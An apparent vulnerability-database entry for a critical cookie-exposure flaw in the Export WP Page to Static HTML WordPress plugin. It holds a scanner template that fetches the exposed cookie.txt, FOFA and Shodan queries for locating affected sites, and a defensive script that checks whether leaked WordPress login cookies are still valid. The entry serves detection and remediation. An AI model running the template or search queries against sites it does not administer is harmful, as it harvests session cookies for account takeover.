
Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure

CVE-2025-11693
Verified

Description

The Export WP Page to Static HTML & PDF WordPress plugin, versions <= 4.3.4, exposes sensitive information through publicly accessible cookies.txt files that contain authentication cookies, letting unauthenticated attackers access sensitive authentication data. Exploitation requires a site administrator to trigger a backup with a specific user role.

Severity

Critical

CVSS Score

9.8

Exploit Probability

5%

Published Date

April 22, 2026

Template Author

0x_akoko

CVE-2025-11693.yaml
id: CVE-2025-11693

info:
  name: Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure
  author: 0x_Akoko
  severity: critical
  description: |
   Export WP Page to Static HTML & PDF WordPress plugin <= 4.3.4 contains a sensitive information exposure caused by publicly exposed cookies.txt files with authentication cookies, letting unauthenticated attackers access sensitive authentication data, exploit requires site administrator to trigger backup with specific user role.
  impact: |
   Unauthenticated attackers can access authentication cookies, potentially leading to account compromise or unauthorized access.
  remediation: |
   Update to the latest version beyond 4.3.4.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-wp-page-to-static-html/export-wp-page-to-static-html-pdf-434-unauthenticated-cookie-exposure-via-log-file
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11693
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-11693
    epss-score: 0.05097
    epss-percentile: 0.89928
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/export-wp-page-to-static-html/"
    shodan-query: http.html:"/wp-content/plugins/export-wp-page-to-static-html/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,export-wp-page-to-static-html,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/export-wp-page-to-static-html/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Export WP Page')"
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/exported_html_files/cookie.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'wordpress')"
          - "contains_all(body, 'TRUE', 'FALSE', 'HttpOnly')"
        condition: and
# digest: 4a0a00473045022100b3dd91b092e2a22fc5e17961559a33f80f1cabd26713d0f301b580ab46393ec202202d85a654f5f5591ce71b78f2e3ae9c76a8b9d6fdd14d8caf35e6b82b10ed848b:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-11693
CWE ID: CWE-200

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-wp-page-to-static-html/export-wp-page-to-static-html-pdf-434-unauthenticated-cookie-exposure-via-log-file
https://nvd.nist.gov/vuln/detail/CVE-2025-11693

Remediation Steps

Update to the latest version beyond 4.3.4.
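
When the exposed file is found on a site you administer, it helps to know whether it holds authentication cookies that are still valid. The following is an added example, not part of the template or the plugin: it assumes the file uses the Netscape cookie-jar layout that the template's TRUE/FALSE/HttpOnly matchers suggest, and the sample data, function names and prefix list are constructed for illustration.

```python
import time

# Constructed sample in Netscape cookie-jar format (the layout curl writes);
# every value is a fabricated placeholder, not taken from a real site.
SAMPLE = """\
# Netscape HTTP Cookie File
#HttpOnly_example.test\tFALSE\t/wp-admin\tTRUE\t4102444800\twordpress_sec_0123abcd\tadmin%7CPLACEHOLDER
#HttpOnly_example.test\tFALSE\t/\tTRUE\t946684800\twordpress_logged_in_0123abcd\tadmin%7CPLACEHOLDER
example.test\tFALSE\t/\tFALSE\t0\twordpress_test_cookie\tWP%20Cookie%20check
"""

# WordPress login cookie name prefixes covered by this check (assumed scope:
# the logged-in and secure-auth cookies; the harmless test cookie is excluded).
AUTH_PREFIXES = ("wordpress_logged_in_", "wordpress_sec_")

def parse_cookie_jar(text):
    """Parse Netscape cookie-jar lines into dicts; skip comments and malformed rows."""
    cookies = []
    for line in text.splitlines():
        http_only = line.startswith("#HttpOnly_")
        if http_only:
            line = line[len("#HttpOnly_"):]   # curl marks HttpOnly cookies this way
        elif not line.strip() or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 7 or not fields[4].isdigit():
            continue
        domain, _sub, path, secure, expires, name, _value = fields
        cookies.append({"domain": domain, "path": path, "secure": secure == "TRUE",
                        "http_only": http_only, "expires": int(expires), "name": name})
    return cookies

def live_auth_cookies(text, now=None):
    """Return WordPress auth cookies that have not expired (expires 0 = session cookie)."""
    now = time.time() if now is None else now
    return [c for c in parse_cookie_jar(text)
            if c["name"].startswith(AUTH_PREFIXES)
            and (c["expires"] == 0 or c["expires"] > now)]

if __name__ == "__main__":
    for c in live_auth_cookies(SAMPLE):
        print(f"still valid: {c['name']} for {c['domain']}{c['path']} "
              f"(expires {c['expires']})")
```

Any cookie this reports should be treated as compromised: invalidate the affected user's sessions and delete the file, in addition to updating the plugin.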